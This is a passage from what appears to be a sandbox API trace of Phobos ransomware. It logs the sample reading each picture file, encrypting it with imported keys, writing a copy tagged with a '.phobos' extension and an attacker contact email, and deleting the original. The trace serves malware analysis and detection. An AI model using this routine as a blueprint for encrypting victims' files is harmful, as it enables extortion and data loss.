HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.997] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=71363) returned 1 [0198.997] CloseHandle (hObject=0x178) returned 1 [0198.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp")) returned 0x20 [0198.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.998] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.998] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.001] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.001] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.001] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x116c3, lpOverlapped=0x0) returned 1 [0199.145] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x116d0, dwBufLen=0x116d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x116d0) returned 1 [0199.146] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x116d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x116d0, lpOverlapped=0x0) returned 1 [0199.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.148] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.148] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.148] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.148] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.148] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.148] CloseHandle (hObject=0x178) returned 1 [0199.148] CloseHandle (hObject=0x160) returned 1 [0199.148] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\HhlW6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\hhlw6.bmp")) returned 1 [0199.149] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.150] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=95627) returned 1 [0199.150] CloseHandle (hObject=0x160) returned 1 [0199.150] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png")) returned 0x20 [0199.150] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.150] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.151] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.151] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.151] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1758b, lpOverlapped=0x0) returned 1 [0199.153] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17590, dwBufLen=0x17590 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17590) returned 1 [0199.153] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x17590, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x17590, lpOverlapped=0x0) returned 1 [0199.155] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.155] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.155] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.155] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.155] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.155] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.155] CloseHandle (hObject=0x160) returned 1 [0199.155] CloseHandle (hObject=0x178) returned 1 [0199.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\AIcLQY1V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\aiclqy1v.png")) returned 1 [0199.157] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.158] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=75064) returned 1 [0199.158] CloseHandle (hObject=0x178) returned 1 [0199.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif")) returned 0x20 [0199.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.160] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.160] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12538, lpOverlapped=0x0) returned 1 [0199.161] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12540, dwBufLen=0x12540 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12540) returned 1 [0199.162] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12540, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12540, lpOverlapped=0x0) returned 1 [0199.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.163] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.163] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.163] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.163] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.164] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.164] CloseHandle (hObject=0x178) returned 1 [0199.164] CloseHandle (hObject=0x160) returned 1 [0199.164] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\b3hy_5529BUU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\b3hy_5529buu.gif")) returned 1 [0199.165] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.165] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=45656) returned 1 [0199.165] CloseHandle (hObject=0x160) returned 1 [0199.165] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png")) returned 0x20 [0199.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.166] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.166] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.166] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.166] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.166] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb258, lpOverlapped=0x0) returned 1 [0199.168] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb260, dwBufLen=0xb260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb260) returned 1 [0199.168] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb260, lpOverlapped=0x0) returned 1 [0199.169] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.169] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.169] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.169] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.169] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.169] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.169] CloseHandle (hObject=0x160) returned 1 [0199.170] CloseHandle (hObject=0x178) returned 1 [0199.170] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\EJ_UqI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ej_uqi.png")) returned 1 [0199.171] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.171] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=59770) returned 1 [0199.171] CloseHandle (hObject=0x178) returned 1 [0199.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif")) returned 0x20 [0199.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.172] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.172] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.172] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.172] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.172] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe97a, lpOverlapped=0x0) returned 1 [0199.174] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe980, dwBufLen=0xe980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe980) returned 1 [0199.174] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe980, lpOverlapped=0x0) returned 1 [0199.176] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.176] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.176] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.176] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.176] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.176] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.176] CloseHandle (hObject=0x178) returned 1 [0199.176] CloseHandle (hObject=0x160) returned 1 [0199.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\LJMGEsp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\ljmgesp.gif")) returned 1 [0199.177] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.178] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8466) returned 1 [0199.178] CloseHandle (hObject=0x160) returned 1 [0199.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg")) returned 0x20 [0199.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 